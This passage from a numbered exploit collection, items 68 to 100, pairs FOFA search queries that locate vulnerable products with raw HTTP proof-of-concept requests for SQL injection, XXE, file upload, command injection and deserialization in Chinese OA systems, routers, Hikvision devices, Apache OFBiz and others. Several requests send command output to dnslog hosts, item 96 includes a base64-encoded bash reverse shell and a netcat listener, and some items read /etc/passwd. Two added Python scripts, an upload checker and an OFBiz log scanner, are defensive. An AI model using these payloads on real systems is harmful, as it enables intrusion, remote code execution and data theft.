GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is shown below; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin NetGod (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify the upload by fetching the file back (the name must match the one uploaded above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

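The two SecGate 3600 requests above differ only in the `g=` endpoint; what a defender actually wants is a check that uploads a harmless random marker and confirms it is served back from /attachements/. The script below is an added example written for this page, not code from the original post or from the vendor. It replays the form fields exactly as the POCs carry them (including the `__hash__` value, whose meaning the POCs do not explain); the marker content, the random file name and the unverified-TLS context are assumptions made for the check.

```python
import secrets
import ssl
import string
import urllib.error
import urllib.request
from typing import Tuple

# Form layout copied from the two POCs above; the __hash__ value is replayed
# unchanged, since the POCs give no indication of how (or whether) it is checked.
POC_HASH = "0b9d6b1ab7479ab69d9f71b05e0e9445"
UPLOAD_ENDPOINTS = ("app_av_import_save", "obj_area_import_save")
ATTACHMENT_DIR = "/attachements/"  # spelling as served by the appliance


def random_name(length: int = 9) -> str:
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def build_multipart(filename: str, content: bytes,
                    boundary: str = "----WebKitFormBoundarykcbkgdfx") -> Tuple[bytes, str]:
    """Serialize the four parts exactly as the POC orders them.
    Returns (body, value for the Content-Type header)."""
    parts = [
        ("MAX_FILE_SIZE", None, None, b"10000000"),
        ("upfile", filename, "text/plain", content),
        ("submit_post", None, None, b"obj_app_upfile"),
        ("__hash__", None, None, POC_HASH.encode()),
    ]
    lines = []
    for name, fname, ctype, data in parts:
        lines.append(f"--{boundary}".encode())
        disposition = f'Content-Disposition: form-data; name="{name}"'
        if fname:
            disposition += f'; filename="{fname}"'
        lines.append(disposition.encode())
        if ctype:
            lines.append(f"Content-Type: {ctype}".encode())
        lines.append(b"")
        lines.append(data)
    lines.append(f"--{boundary}--".encode())
    lines.append(b"")
    return b"\r\n".join(lines), f"multipart/form-data; boundary={boundary}"


def attachment_url(base: str, filename: str) -> str:
    return base.rstrip("/") + ATTACHMENT_DIR + filename


def check_upload(base: str, endpoint: str, timeout: float = 10.0) -> bool:
    """Upload a harmless random marker through one endpoint, then try to read it
    back from /attachements/. True only if the marker itself is served, so a
    generic 200 page at that path does not count as a finding."""
    name = random_name() + ".txt"
    marker = random_name(32).encode()
    body, content_type = build_multipart(name, marker)
    ctx = ssl._create_unverified_context()  # appliances usually have self-signed certs
    headers = {"Content-Type": content_type, "User-Agent": "Mozilla/5.0"}
    req = urllib.request.Request(f"{base.rstrip('/')}/?g={endpoint}", data=body,
                                 headers=headers, method="POST")
    try:
        urllib.request.urlopen(req, timeout=timeout, context=ctx).read()
        fetched = urllib.request.urlopen(attachment_url(base, name), timeout=timeout,
                                         context=ctx).read()
    except (urllib.error.URLError, OSError):
        return False
    return fetched.strip() == marker


if __name__ == "__main__":
    import sys
    target = sys.argv[1]  # e.g. https://x.x.x.x
    for ep in UPLOAD_ENDPOINTS:
        print(ep, "vulnerable" if check_upload(target, ep) else "not confirmed")
```

Comparing the fetched body with the marker, rather than just checking for a 200, avoids false positives from appliances that answer every path under /attachements/ with a login page.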
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

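Both OFBiz requests in sections 95 and 96 share the same auth-bypass fingerprints: a path parameter (`;/`) appended to the control URI, and `requirePasswordChange=Y` with empty or junk credentials in the query string. For defenders who cannot patch immediately, the script below is an added example (not from the original post or the OFBiz project) that scans access-log lines in the common log format for those two indicators and reports only hits on the `xmlrpc` and `ProgramExport` views. The log lines are constructed for the example; the set of sensitive views and the log format are assumptions you should adapt to your own deployment.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Common log format: client, timestamp, request line, status (constructed sample below)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Views reached by the two POCs: the XML-RPC endpoint and the Groovy ProgramExport page
SENSITIVE_VIEWS = {"xmlrpc", "ProgramExport"}
CONTROL_PREFIX = "/webtools/control/"


def classify_request(target: str) -> Optional[Dict[str, object]]:
    """Return a finding for one request target, or None when nothing is suspicious."""
    parts = urlsplit(target)
    raw_path = parts.path
    # Drop path parameters (";jsessionid=..." and the bare ";/" of CVE-2023-49070)
    # so the view name is what OFBiz resolves, not what the auth filter saw.
    clean_path = "/".join(seg.split(";", 1)[0] for seg in raw_path.split("/"))
    if not clean_path.startswith(CONTROL_PREFIX):
        return None
    view = clean_path[len(CONTROL_PREFIX):].strip("/")
    query = parse_qs(parts.query, keep_blank_values=True)
    indicators: List[str] = []
    if ";" in raw_path:
        indicators.append("path parameter in control URI")
    if query.get("requirePasswordChange", [""])[0].upper() == "Y":
        indicators.append("requirePasswordChange=Y in query")
    if view in SENSITIVE_VIEWS and indicators:
        return {"view": view, "indicators": indicators}
    return None


def scan_log(text: str) -> List[Dict[str, object]]:
    """Run classify_request over every parsable line and attach client/time/status."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"), status=int(m.group("status")))
            hits.append(finding)
    return hits


# Constructed sample lines (not real traffic); the first two mirror sections 95 and 96,
# the last two are ordinary authenticated use and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:21:03 +0000] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 1532
203.0.113.7 - - [10/Jan/2024:10:21:09 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 4421
198.51.100.4 - - [10/Jan/2024:10:22:11 +0000] "GET /webtools/control/main HTTP/1.1" 200 8812
198.51.100.4 - - [10/Jan/2024:10:22:15 +0000] "POST /webtools/control/ProgramExport HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Stripping the path parameter before matching the view is the important step: the bypass works precisely because the authentication filter and the view resolver disagree about the URI, so a detector that matches the raw path against `/webtools/control/xmlrpc` would miss the `;/` variant.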
97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
